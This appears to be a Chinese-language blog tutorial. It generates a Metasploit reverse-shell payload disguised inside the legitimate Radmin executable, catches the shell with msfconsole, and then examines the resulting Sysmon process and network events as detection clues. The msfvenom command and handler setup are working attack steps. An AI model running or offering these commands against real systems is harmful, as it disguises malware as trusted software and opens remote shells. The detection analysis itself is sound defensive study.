metasploit程序注入 sysmon事件採集示例
阿新 • • 發佈:2022-04-21
生成payload:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe
靶機執行r2admin,並在攻擊機用msfconsole接收反彈shell
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf5 exploit( multi/handler) > set lhost 10.10.10.136
lhost => 10.10.10.136
msf5 exploit(multi/handler) > set lport 9876
lport => 9876
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.10.136:9876
[*] Command shell session 1 opened (10.10.10.136:9876 -> 10.10.10.166:50097) at 2020-07-15 23:45:36 -0400
pwd
pwd
'pwd' �����ڲ����ⲿ���Ҳ���ǿ����еij���
�������ļ���
C:\Users\lovely\Desktop>whoami
whoami
lovely-pc\lovely
我自己根據上述方法的操作截圖:
我們看看程序注入成功後產生了3條事件:
Process Create: RuleName: - UtcTime: 2022-04-21 07:10:32.488 ProcessGuid: {f7ee4450-0368-6261-1401-000000000500} ProcessId: 1988 Image: C:\Users\76194\meter.exe ==》路徑是惡意的檔名 FileVersion: 3, 0, 0, 1 Description: Radmin Viewer ==》但是檔案描述啥的都是使用的radmin的 Product: Radmin Viewer Company: Famatech, Inc. ==》公司啥的也是 OriginalFileName: Radmin.exe ==》original 檔名也是!!!由此看,msf的程序注入就是假借了一個殼啊!!!???? CommandLine: meter.exe ==》命令列執行 CurrentDirectory: C:\Users\76194\ User: DESKTOP-UKAQ1J3\76194 LogonGuid: {f7ee4450-f98e-6260-0327-030000000000} LogonId: 0x32703 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: MD5=7D7D702AE3DD202C691DE6C53D6EC09B,SHA256=4BC01EAF72B2651729D39B5A94BA6969D31A0DEF194467411852C063A069CAFA,IMPHASH=B57FE998F1E11811F80ABFD6E10DCF47 ParentProcessGuid: {f7ee4450-fb48-6260-9900-000000000500} ParentProcessId: 5320 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: "C:\Windows\system32\cmd.exe" ParentUser: DESKTOP-UKAQ1J3\76194
Process Create: RuleName: - UtcTime: 2022-04-21 07:10:32.530 ProcessGuid: {f7ee4450-0368-6261-1501-000000000500} ProcessId: 428 Image: C:\Windows\SysWOW64\cmd.exe FileVersion: 10.0.19041.746 (WinBuild.160101.0800) Description: Windows Command Processor Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: Cmd.Exe CommandLine: cmd CurrentDirectory: C:\Users\76194\ User: DESKTOP-UKAQ1J3\76194 LogonGuid: {f7ee4450-f98e-6260-0327-030000000000} LogonId: 0x32703 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A ParentProcessGuid: {f7ee4450-0368-6261-1401-000000000500} ParentProcessId: 1988 ParentImage: C:\Users\76194\meter.exe ==》這個說明是在子程序裡建立了cmd.exe,供反彈shell使用 ParentCommandLine: meter.exe ParentUser: DESKTOP-UKAQ1J3\76194
Network connection detected: RuleName: Usermode UtcTime: 2022-04-21 07:10:32.520 ProcessGuid: {f7ee4450-0368-6261-1401-000000000500} ProcessId: 1988 Image: C:\Users\76194\meter.exe ==》反彈shell的聯網事件 User: DESKTOP-UKAQ1J3\76194 Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 192.168.168.138 SourceHostname: DESKTOP-UKAQ1J3 SourcePort: 57194 SourcePortName: - DestinationIsIpv6: false DestinationIp: 192.168.168.96 ==》這個是我的msf遠控機器 DestinationHostname: - DestinationPort: 8800
在反彈shell裡執行一條whoami命令:
其父程序是cmd